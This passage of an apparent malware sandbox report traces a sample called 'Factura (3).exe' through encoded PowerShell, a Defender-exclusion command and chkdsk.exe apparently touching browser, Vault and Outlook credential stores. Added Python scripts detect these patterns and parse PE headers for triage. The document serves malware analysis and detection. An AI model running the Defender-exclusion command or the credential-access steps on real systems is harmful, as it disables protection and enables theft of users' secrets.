            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ParentProcessId FROM Win32_Process WHERE ProcessId = 7492
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\Factura (3).exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: chkdsk.exe, 00000017.00000002.3764249613.0000000004FD8000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000003.1751891987.0000000004FD8000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000002.3764249613.0000000005004000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000002.3764249613.0000000004FE1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Factura (3).exe | ReversingLabs: Detection: 34%
            Source: unknown | Process created: C:\Users\user\Desktop\Factura (3).exe "C:\Users\user\Desktop\Factura (3).exe"
            Source: C:\Users\user\Desktop\Factura (3).exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Factura (3).exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -EncodedCommand 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
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Factura (3).exe" -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7492 -s 2236
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe | Process created: C:\Windows\SysWOW64\chkdsk.exe "C:\Windows\SysWOW64\chkdsk.exe"
            Source: C:\Windows\SysWOW64\chkdsk.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Factura (3).exe  Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Factura (3).exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: version.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe  Section loaded: wininet.dll
Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe  Section loaded: mswsock.dll
Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe  Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe  Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe  Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe  Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: Window Recorder  Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\chkdsk.exe  Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
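Read together, the process-creation, module-load and registry lines above carry the behaviours that matter for triage: an encoded PowerShell command line whose child process adds a Defender exclusion for the sample (Add-MpPreference -ExclusionPath), PowerShell spawning csc.exe (runtime C# compilation via Add-Type), and chkdsk.exe, a utility that never spawns children of its own, launching Firefox, loading winsqlite3.dll, vaultcli.dll and dpapi.dll (browser SQLite stores, Windows Vault, DPAPI) and then opening the Outlook profile key. One caveat on the Program Files (x86) process KAnMKAQhHABqpRuDRpLtww.exe: its image carries the PDB path of Joe Sandbox's FakeChrome tool (see the binary strings further down), so it is the sandbox's decoy browser executable, not a payload file to hunt for on real hosts. The Python below is an added triage script, not part of the report or of any Joe Sandbox tooling. It runs over a constructed set of lines in the report's "Source: <process>  <kind>: <detail>" shape; because the page does not reproduce the real -EncodedCommand blob, the script builds a stand-in blob from the plain Add-MpPreference command the report shows and decodes it the way PowerShell does (Base64 over UTF-16LE). The rule names and the HOLLOW_HOSTS set are this example's own choices.

```python
import base64
import re
from typing import Dict, List, Optional

# --- Constructed sample in the report's "Source: <proc>  <kind>: <detail>" shape ---
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CHKDSK = r"C:\Windows\SysWOW64\chkdsk.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
# Stand-in for the encoded blob the page does not reproduce: PowerShell expects Base64(UTF-16LE).
INNER_CMD = 'Add-MpPreference -ExclusionPath "C:\\Users\\user\\Desktop\\Factura (3).exe" -Force'
STANDIN_B64 = base64.b64encode(INNER_CMD.encode("utf-16-le")).decode("ascii")

SAMPLE_LINES = [
    rf"Source: C:\Users\user\Desktop\Factura (3).exe  Process created: {PS} powershell.exe -EncodedCommand {STANDIN_B64}",
    rf'Source: {PS}  Process created: {PS} "{PS}" {INNER_CMD}',
    rf'Source: {PS}  Process created: {CSC} "{CSC}"',
    rf'Source: {PS}  Process created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe"',
    rf'Source: {CHKDSK}  Process created: {FIREFOX} "{FIREFOX}"',
    rf"Source: {CHKDSK}  Section loaded: winsqlite3.dll",
    rf"Source: {CHKDSK}  Section loaded: vaultcli.dll",
    rf"Source: {CHKDSK}  Section loaded: dpapi.dll",
    rf"Source: {CHKDSK}  Section loaded: uxtheme.dll",
    rf"Source: {CHKDSK}  Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook",
]

LINE_RE = re.compile(r"^Source: (?P<source>.+?)\s{2,}(?P<kind>Process created|Section loaded|Key opened): (?P<detail>.*)$")
IMAGE_RE = re.compile(r"^(?P<image>.+?\.exe)\s+(?P<cmdline>.*)$", re.IGNORECASE)
# -e / -ec / -enc / -encoded / -encodedcommand followed by a Base64 blob; "-ep" and "-ExclusionPath" do not match.
ENC_RE = re.compile(r"-e(?:c|nc|ncoded|ncodedcommand)?\s+(?P<b64>[A-Za-z0-9+/=]{16,})", re.IGNORECASE)

HOLLOW_HOSTS = {"chkdsk.exe"}  # utilities seen hosting injected code in this report; extend from your own telemetry
CREDENTIAL_DLLS = {"vaultcli.dll", "winsqlite3.dll", "dpapi.dll"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Plaintext of a PowerShell -EncodedCommand argument, or None if absent or not valid Base64/UTF-16LE."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group("b64"), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(lines: List[str]) -> List[Dict[str, str]]:
    """Apply the four checks to report-shaped lines and return one finding per hit."""
    findings: List[Dict[str, str]] = []

    def hit(rule: str, proc: str, evidence: str) -> None:
        findings.append({"rule": rule, "process": proc, "evidence": evidence})

    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        src, kind, detail = basename(m["source"]), m["kind"], m["detail"]
        if kind == "Process created":
            im = IMAGE_RE.match(detail)
            if not im:
                continue
            child, cmdline = basename(im["image"]), im["cmdline"]
            decoded = decode_encoded_command(cmdline)
            if decoded is not None:
                hit("encoded_powershell", src, decoded)
            if "mppreference" in (decoded or cmdline).lower():   # Add-/Set-MpPreference = Defender tampering
                hit("defender_exclusion", src, decoded or cmdline)
            if src == "powershell.exe" and child == "csc.exe":   # Add-Type compiling C# at runtime
                hit("powershell_compiles_csharp", src, child)
            if src in HOLLOW_HOSTS:                              # chkdsk.exe has no business spawning anything
                hit("utility_spawns_child", src, child)
        elif kind == "Section loaded":
            if src in HOLLOW_HOSTS and detail.strip().lower() in CREDENTIAL_DLLS:
                hit("credential_dll_load", src, detail.strip())
        elif kind == "Key opened":
            if "\\outlook\\profiles" in detail.lower() and src != "outlook.exe":
                hit("outlook_profile_access", src, detail)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f"{f['rule']:28} {f['process']:16} {f['evidence'][:70]}")
```

The same checks map directly onto Sysmon telemetry (event 1 for process creation with ParentImage/CommandLine, event 7 for image loads, event 12/13 for registry access), which is where they belong on production hosts.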
Source: Factura (3).exe  Static PE information: Image base 0x140000000 > 0x60000000
Source: Factura (3).exe  Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Factura (3).exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
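The three static-PE lines above are best read together: 0x140000000 is the MSVC linker's default image base for 64-bit executables, so the "image base > 0x60000000" observation on its own only says the file is an ordinary x64 EXE, and with DYNAMIC_BASE and HIGH_ENTROPY_VA set the loader relocates it anyway; the DEBUG data directory (IMAGE_DIRECTORY_ENTRY_DEBUG, index 6) is where a CodeView record with a PDB path would sit if the sample carried one. The Python below is an added example, not code from the report, showing where each of those values lives in the PE optional header. It builds a constructed PE32+ header in memory (DOS stub, PE signature, COFF header, optional header, no sections, so it is not a loadable image) and parses it; point parse_pe_headers() at the bytes of a real file to reproduce the report's values. The "linker default" wording and the DEFAULT_IMAGE_BASE table are this example's own.

```python
import struct
from typing import Dict

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
IMAGE_DIRECTORY_ENTRY_DEBUG = 6
IMAGE_FILE_DLL = 0x2000
# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
# MSVC link.exe /BASE defaults, keyed by (pe32plus, is_dll)
DEFAULT_IMAGE_BASE = {(True, False): 0x140000000, (True, True): 0x180000000,
                      (False, False): 0x400000, (False, True): 0x10000000}


def parse_pe_headers(data: bytes) -> Dict[str, object]:
    """Read ImageBase, DllCharacteristics and the debug directory entry from a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, _nsect, _ts, _symptr, _nsym, _optsize, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == PE32PLUS_MAGIC:          # PE32+: ImageBase is 8 bytes at +24 (no BaseOfData field)
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
        ndirs_off = 108
    elif magic == PE32_MAGIC:            # PE32: BaseOfData at +24, ImageBase 4 bytes at +28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
        ndirs_off = 92
    else:
        raise ValueError(f"unknown optional header magic 0x{magic:x}")
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in both formats
    ndirs = struct.unpack_from("<I", data, opt + ndirs_off)[0]
    has_debug = False
    if ndirs > IMAGE_DIRECTORY_ENTRY_DEBUG:
        _rva, size = struct.unpack_from("<II", data, opt + ndirs_off + 4 + IMAGE_DIRECTORY_ENTRY_DEBUG * 8)
        has_debug = size > 0
    return {
        "machine": machine,
        "pe32plus": magic == PE32PLUS_MAGIC,
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "image_base": image_base,
        "dll_characteristics": [name for bit, name in sorted(DLL_CHARACTERISTICS.items()) if dll_chars & bit],
        "has_debug_directory": has_debug,
    }


def image_base_note(hdr: Dict[str, object]) -> str:
    """Turn the raw image base into the observation an analyst actually wants."""
    if hdr["image_base"] == DEFAULT_IMAGE_BASE[(hdr["pe32plus"], hdr["is_dll"])]:
        return "linker default"
    if "DYNAMIC_BASE" in hdr["dll_characteristics"]:
        return "non-default, but ASLR will relocate it"
    return "non-default and not relocatable: worth a closer look"


def build_pe32plus_header(image_base: int, dll_chars: int, debug_size: int = 0, is_dll: bool = False) -> bytes:
    """Constructed minimal PE32+ header for offline testing (no sections, not loadable)."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                    # e_lfanew
    opt = bytearray(112 + 16 * 8)                               # PE32+ optional header, 16 data directories
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC)
    struct.pack_into("<Q", opt, 24, image_base)
    struct.pack_into("<H", opt, 68, 2)                          # IMAGE_SUBSYSTEM_WINDOWS_GUI
    struct.pack_into("<H", opt, 70, dll_chars)
    struct.pack_into("<I", opt, 108, 16)                        # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112 + IMAGE_DIRECTORY_ENTRY_DEBUG * 8, 0x2000 if debug_size else 0, debug_size)
    characteristics = 0x0022 | (IMAGE_FILE_DLL if is_dll else 0)  # EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, len(opt), characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Values the report lists for the sample, reproduced in the constructed header.
SAMPLE_HEADER = build_pe32plus_header(0x140000000, 0x0020 | 0x0040 | 0x0100 | 0x8000, debug_size=0x1C)

if __name__ == "__main__":
    hdr = parse_pe_headers(SAMPLE_HEADER)
    print(f"ImageBase 0x{hdr['image_base']:X} ({image_base_note(hdr)})")
    print(", ".join(hdr["dll_characteristics"]), "| debug dir:", hdr["has_debug_directory"])
```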
            Source: Binary string: System.Configuration.Install.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Data.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.pdbp source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb! source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Core.pdbN source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: csc.exe, csc.exe, 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 0000000E.00000003.1424584842.0000000005012000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000E.00000002.1567920536.000000000550E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000003.1567081999.000000000505D000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000003.1569342109.0000000005202000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb" source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Numerics.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: chkdsk.pdbGCTL source: csc.exe, 0000000E.00000002.1567571580.0000000004F17000.00000004.00000020.00020000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000002.3764224956.0000000001558000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Management.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.DirectoryServices.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000009.00000002.1604691590.000001CE29C10000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb" source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: chkdsk.pdb source: csc.exe, 0000000E.00000002.1567571580.0000000004F17000.00000004.00000020.00020000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000002.3764224956.0000000001558000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: e.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.pdb` source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.DirectoryServices.pdb source: WERFCB2.tmp.dmp.17.dr
